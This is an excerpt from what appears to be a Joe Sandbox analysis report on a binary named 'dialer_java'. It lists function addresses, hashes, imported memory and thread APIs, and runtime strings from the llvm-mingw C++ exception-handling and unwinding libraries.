Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: realloc$freememcpy
String ID:
API String ID: 2038854750-0
Opcode ID: a14b495c1d2ab2fb7fa7001a555ecdf9c52a2580ad9786f42b98ddf7beecf6c3
Instruction ID: 8aeff549023aeac1639f56d10329ac15b1f162f6289c9942aa77f7ab27475e1f
Opcode Fuzzy Hash: a14b495c1d2ab2fb7fa7001a555ecdf9c52a2580ad9786f42b98ddf7beecf6c3
Instruction Fuzzy Hash: 6B91B0A2A09B4682EF288F16D54437863E1FB55FC4F089676CF4D87795DF2CE86A8304

Function 00007FF695DD4F60 Relevance: 7.7, APIs: 5, Instructions: 227COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF695DD4FED
realloc.MSVCRT ref: 00007FF695DD506D
malloc.MSVCRT ref: 00007FF695DD50D6

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: realloc$malloc
String ID:
API String ID: 454241450-0
Opcode ID: c0b732543a884f7b52177f9fd860a4d077764d15161aa00754840a6817184501
Instruction ID: b245bc320ca209e312cfe3c2e0d2fb67798bede977e50ac32adc82230018cd56
Opcode Fuzzy Hash: c0b732543a884f7b52177f9fd860a4d077764d15161aa00754840a6817184501
Instruction Fuzzy Hash: 2A71E572A05B8582EB258F1AF4446ACB7A0EB58FC0F048232CF9D47BA1DF3CD5968700

Function 00007FF695DD57A0 Relevance: 7.7, APIs: 5, Instructions: 217COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF695DD5814
realloc.MSVCRT ref: 00007FF695DD58DE
realloc.MSVCRT ref: 00007FF695DD592D

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: realloc
String ID:
API String ID: 471065373-0
Opcode ID: 2f7d11eb0644d44da1dbadc0eedc91ed27022fc7bc0ddba03700444f196e75e1
Instruction ID: 97b00fb7439df4a59676123d0a2c53874201720a6ff624929dda757a23d2cc8b
Opcode Fuzzy Hash: 2f7d11eb0644d44da1dbadc0eedc91ed27022fc7bc0ddba03700444f196e75e1
Instruction Fuzzy Hash: 2A7170A2A05B4582EA35CF56E580269A3E1EB54FC0F449172CF9E47B90EF3CE895C304

Function 00007FF695DCF040 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 99COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF695DCF0EA

Strings

/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF695DCF8CE
Last != First && "Calling back() on empty vector!", xrefs: 00007FF695DCF8C7
struct, xrefs: 00007FF695DCF042
std, xrefs: 00007FF695DCF146

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: malloc
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$Last != First && "Calling back() on empty vector!"$std$struct
API String ID: 2803490479-3902771045
Opcode ID: dac1940aed7c4ebf5e6eaeff0607231698d0c583ff25a4c13798f383bb8af2b8
Instruction ID: 28e530487f5257368bf5f8bb1224af9154a078147415ebfba776c2a997727db4
Opcode Fuzzy Hash: dac1940aed7c4ebf5e6eaeff0607231698d0c583ff25a4c13798f383bb8af2b8
Instruction Fuzzy Hash: 1E31E122B0BA8240EF658B15D5447B926D5EB04F80F065671CE5C8B3D1EF3CE99A8318

Function 00007FF695DC4D90 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 86COMMON

Download Yara Rule

Strings

cannot zero out thread value for __cxa_get_globals(), xrefs: 00007FF695DC4E1F
cannot create thread specific key for __cxa_get_globals(), xrefs: 00007FF695DC4DF0
execute once failure in __cxa_get_globals_fast(), xrefs: 00007FF695DC4DBA

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: Once$ExecuteInit
String ID: cannot create thread specific key for __cxa_get_globals()$cannot zero out thread value for __cxa_get_globals()$execute once failure in __cxa_get_globals_fast()
API String ID: 689400697-2130391284
Opcode ID: 91adbefc2d04b81e052fcb574bb784da4279744b813a2942087cac727f191c56
Instruction ID: dee9add9a1810f05c02943e3a7ab3c35c9c4171a7f43dc34df4fe43b5d39ac41
Opcode Fuzzy Hash: 91adbefc2d04b81e052fcb574bb784da4279744b813a2942087cac727f191c56
Instruction Fuzzy Hash: F7219121E1950381FE74AB15EE405B422E0EF95F40F912AB4DA0DC67A1EF3CAD5EC344

Function 00007FF695DC6DB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 139stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF695DC6E40

Strings

+, xrefs: 00007FF695DC6EA5

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: strlen
String ID: +
API String ID: 39653677-2126386893
Opcode ID: 034d9eeac7ed9f065a3bffca9e980f61809d116cd8220f59320f650e106faf8c
Instruction ID: f14372d4e7cce4eebb4d14ef6addc7ee56314aa557113dbda3a541cb9533302d
Opcode Fuzzy Hash: 034d9eeac7ed9f065a3bffca9e980f61809d116cd8220f59320f650e106faf8c
Instruction Fuzzy Hash: C451DA6261C2414BDB348A29F05067EB7D0E751F54F049379EB9A87AC5DF3CE909CB04

Function 00007FF695DE17D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 132stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF695DE1860

Strings

+, xrefs: 00007FF695DE18C5

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: strlen
String ID: +
API String ID: 39653677-2126386893
Opcode ID: bd7113bcb185bcac57370222d55923cd67c9b6dee89d6d9374e4d696b49277c4
Instruction ID: 3d001631e82fa9670de56fe7e35310d25e9a3aee5e9012144d1d6bc7148e17d4
Opcode Fuzzy Hash: bd7113bcb185bcac57370222d55923cd67c9b6dee89d6d9374e4d696b49277c4
Instruction Fuzzy Hash: 0851A622B0C2428BE7348A65D45067EF7D0E705B90F446375DBAA87AC1DF2CE90DCB05

Function 00007FF695DC8350 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

getenv.MSVCRT ref: 00007FF695DC83AA
RtlCaptureContext.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00007FF695DC84FA

Strings

LIBUNWIND_PRINT_APIS, xrefs: 00007FF695DC83A3
libunwind: __unw_init_local(cursor=%p, context=%p), xrefs: 00007FF695DC83D0

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: CaptureContextgetenv
String ID: LIBUNWIND_PRINT_APIS$libunwind: __unw_init_local(cursor=%p, context=%p)
API String ID: 2386080382-2955335536
Opcode ID: 88fb065359ffd1b41ab9e8c7e360d3eec1f5404c89570d5450073f280386e48f
Instruction ID: 78b36d30c4fdf52f2b7b0b4349ce5739908b43f4e9bb0031bdab158abc9fe273
Opcode Fuzzy Hash: 88fb065359ffd1b41ab9e8c7e360d3eec1f5404c89570d5450073f280386e48f
Instruction Fuzzy Hash: F0613F21908AC492F72A4B2CE5057F5A3B4FF94755F046221EFD952261FF3AE6E6C340

Function 00007FF695DE1336 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF695DE13A0
memset.MSVCRT ref: 00007FF695DE1431
fputc.MSVCRT ref: 00007FF695DE14A9

Strings

0, xrefs: 00007FF695DE1451

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: memset$fputc
String ID: 0
API String ID: 2903701566-4108050209
Opcode ID: a0d3a5661ce36724ce4f0edf4d6f76673b84bc3000fc61610cd582833da42273
Instruction ID: de020477b30bf4cb5b20b14f37a3347269df0be986854d833f8f389eb3e64ea4
Opcode Fuzzy Hash: a0d3a5661ce36724ce4f0edf4d6f76673b84bc3000fc61610cd582833da42273
Instruction Fuzzy Hash: F841D452F0828246F7764EA6A144379A6D1EB15B44F047370CE6BD67C2DE3CED4C8308

Function 00007FF695DC86C0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

getenv.MSVCRT ref: 00007FF695DC86ED
fflush.MSVCRT ref: 00007FF695DC8739

Strings

libunwind: __unw_set_reg(cursor=%p, regNum=%d, value=0x%llx), xrefs: 00007FF695DC8719
LIBUNWIND_PRINT_APIS, xrefs: 00007FF695DC86E6

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: fflushgetenv
String ID: LIBUNWIND_PRINT_APIS$libunwind: __unw_set_reg(cursor=%p, regNum=%d, value=0x%llx)
API String ID: 1137233558-2498214732
Opcode ID: 2626be18dc42d8a8097e90423a9df2a82f05378c710c0b61fbde6bc6877379b2
Instruction ID: 3189917e6b98b7566ea8e3beadad4dc102c997a121d5a827c520f32f99e5aa89
Opcode Fuzzy Hash: 2626be18dc42d8a8097e90423a9df2a82f05378c710c0b61fbde6bc6877379b2
Instruction Fuzzy Hash: 4731C025A08A4941EB349B1AE84067867A1EF89FD4F1402B6CE4E937E0DF3DDD4AC304

Function 00007FF695DC29A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON

Download Yara Rule

Strings

CCG , xrefs: 00007FF695DC29B7

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID:
String ID: CCG
API String ID: 0-1584390748
Opcode ID: bca2953d2b6e64a94037ce9de8f585ddac2b29dba40fb9bb50120e72cae4939b
Instruction ID: c90c4c1ed353bb149b03357a9b0c49550a3549ebae799786ab06f7ecb294afe1
Opcode Fuzzy Hash: bca2953d2b6e64a94037ce9de8f585ddac2b29dba40fb9bb50120e72cae4939b
Instruction Fuzzy Hash: 84217A31E0920241FE798619E69037911C2DF86F60F24A7B5DE9EC73D5DF6CACC99248

Function 00007FF695DD149D Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 70COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF695DD16CB

Part of subcall function 00007FF695DD0A70: strlen.MSVCRT ref: 00007FF695DD0B79

Strings

/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF695DD1E5C
starts_with(Res, "operator") && "operator name does not start with 'operator'", xrefs: 00007FF695DD1E55

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: mallocstrlen
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$starts_with(Res, "operator") && "operator name does not start with 'operator'"
API String ID: 770973918-3503049562
Opcode ID: 7ad9bc6fb11ea0c1023f7e788617ed7f8260cd34674b678aa8a858bf99d7ee5a
Instruction ID: 26e2f847a163166556c5a42dccc7f1e84cf001c01cd77ca69e2958aa2c0c2453
Opcode Fuzzy Hash: 7ad9bc6fb11ea0c1023f7e788617ed7f8260cd34674b678aa8a858bf99d7ee5a
Instruction Fuzzy Hash: E331D132A1978285EA21CB14E0043A877A4EB45F41F455376DE5D8B791EF3CFA8AC304

Function 00007FF695DD1215 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF695DD0B79
malloc.MSVCRT ref: 00007FF695DD1251
_assert.MSVCRT ref: 00007FF695DD1E69
malloc.MSVCRT ref: 00007FF695DD1EB6

Strings

/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF695DD1E5C
starts_with(Res, "operator") && "operator name does not start with 'operator'", xrefs: 00007FF695DD1E55

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: malloc$_assertstrlen
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$starts_with(Res, "operator") && "operator name does not start with 'operator'"
API String ID: 3012236610-3503049562
Opcode ID: 80f2192df68dbc29744cb51aa87aac9d3ce2de7a8ecce5c615236e9c91d40759
Instruction ID: 9079b6e2e61cdc7388c11f9688a3fb985680f4164d011465815f5ba4922f8f7e
Opcode Fuzzy Hash: 80f2192df68dbc29744cb51aa87aac9d3ce2de7a8ecce5c615236e9c91d40759
Instruction Fuzzy Hash: 4E21B43260674189EB65CB14E4087A937E8EB45B80F451376EE5D4B7A1DF3CEA4AC314

Function 00007FF695DDC460 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF695DDC498
realloc.MSVCRT ref: 00007FF695DDC4FF

Strings

_if:, xrefs: 00007FF695DDC4B7
[enable, xrefs: 00007FF695DDC4A9

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: realloc
String ID: [enable$_if:
API String ID: 471065373-3342140569
Opcode ID: 32ce757cdf94413e0a34cfbba9be9b52abb9da3bc6a676b3070354fd22958f46
Instruction ID: 95579cb5cd64917007dd9a9379b5c4493cf0aa7ee93e3834243b804cd3b46db7
Opcode Fuzzy Hash: 32ce757cdf94413e0a34cfbba9be9b52abb9da3bc6a676b3070354fd22958f46
Instruction Fuzzy Hash: 13114CB2A06B8682DA289F46F45426DA3A1EB54BC0F50D671CB8E477A1EF3CE9458344

Function 00007FF695DC8600 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

getenv.MSVCRT ref: 00007FF695DC862C
fflush.MSVCRT ref: 00007FF695DC8678

Strings

libunwind: __unw_get_reg(cursor=%p, regNum=%d, &value=%p), xrefs: 00007FF695DC8658
LIBUNWIND_PRINT_APIS, xrefs: 00007FF695DC8625

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: fflushgetenv
String ID: LIBUNWIND_PRINT_APIS$libunwind: __unw_get_reg(cursor=%p, regNum=%d, &value=%p)
API String ID: 1137233558-3294674404
Opcode ID: 9cb7dbdd395e0dc0e117b359f92bc1a8fce241447a1837db2b0fbb34ec30046f
Instruction ID: f708795daae9ac19d059e750633711c43dd3d2570b7014a5535b59821b7a49ac
Opcode Fuzzy Hash: 9cb7dbdd395e0dc0e117b359f92bc1a8fce241447a1837db2b0fbb34ec30046f
Instruction Fuzzy Hash: 39119A21E0964642FB349B22F95067866D0EF98F84F0811B9CD4EC73A1DE2DAD8E9304

Function 00007FF695DD70F0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF695DD7133
memcpy.MSVCRT ref: 00007FF695DD715E

Strings

true, xrefs: 00007FF695DD714D
false, xrefs: 00007FF695DD7146

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: memcpyrealloc
String ID: false$true
API String ID: 2500458235-2658103896
Opcode ID: 1e1fe210c3eab68983c4b7e7364e77fabcd6bcea1fa908b9b662bbad9f5be460
Instruction ID: e1223772d48b5542f6fde6301ee79936804a95d1bb57b34cc02acb2db5187db5
Opcode Fuzzy Hash: 1e1fe210c3eab68983c4b7e7364e77fabcd6bcea1fa908b9b662bbad9f5be460
Instruction Fuzzy Hash: 6301F5E2F05B4642FF289B11F9403B963E1EB44FC4F44A671CA4D47691EE2CD9898304

Function 00007FF695DC89B0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

getenv.MSVCRT ref: 00007FF695DC89E2
fflush.MSVCRT ref: 00007FF695DC8A2D

Strings

LIBUNWIND_PRINT_APIS, xrefs: 00007FF695DC89DB
libunwind: __unw_get_proc_name(cursor=%p, &buf=%p, bufLen=%lu), xrefs: 00007FF695DC8A0D

Memory Dump Source

Source File: 0000000F.00000002.1919425166.00007FF695DC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF695DC0000, based on PE: true

Associated: 0000000F.00000002.1919413370.00007FF695DC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919444125.00007FF695DE9000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919461643.00007FF695DF3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919532180.00007FF695EEF000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000F.00000002.1919546525.00007FF695EF3000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ff695dc0000_dialer_java.jbxd

Similarity

API ID: fflushgetenv
String ID: LIBUNWIND_PRINT_APIS$libunwind: __unw_get_proc_name(cursor=%p, &buf=%p, bufLen=%lu)
API String ID: 1137233558-3584756005
Opcode ID: ddb072e9844bd1fc43088026deb61ec753b8945efa0d84c694245139cab19971
Instruction ID: 3030c85a00a4d1163465b0e6d24601c4a52af70be35d92fe751a512ce1ce2a00
Opcode Fuzzy Hash: ddb072e9844bd1fc43088026deb61ec753b8945efa0d84c694245139cab19971
Instruction Fuzzy Hash: AA11A011E1928642FF248712ED046B556C0AF95FD0F0412BADC0ED73A1DE3CDD4E8308

Function 00007FF695DC4D00 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF695DC8C00: InitOnceExecuteOnce.KERNEL32(?,?,?,?,00007FF695DC4D18,?,?,?,00007FF695DC2E71,?,?,00007FF695EECC48,00000000,00007FF695DC1609), ref: 00007FF695DC8C11

FlsGetValue.KERNEL32(?,?,?,00007FF695DC2E71,?,?,00007FF695EECC48,00000000,00007FF695DC1609,?,?,?,?,00007FF695DC1315), ref: 00007FF695DC4D22

Part of subcall function 00007FF695DC80D0: calloc.MSVCRT ref: 00007FF695DC80DD
Part of subcall function 00007FF695DC80D0: memset.MSVCRT ref: 00007FF695DC8106

Part of subcall function 00007FF695DC8C90: FlsSetValue.KERNEL32(?,?,?,?,00007FF695DC4E16), ref: 00007FF695DC8C94

Strings

std::__libcpp_tls_set failure in __cxa_get_globals(), xrefs: 00007FF695DC4D79
execute once failure in __cxa_get_globals_fast(), xrefs: 00007FF695DC4D61
cannot allocate __cxa_eh_globals, xrefs: 00007FF695DC4D6D

Memory Dump Source

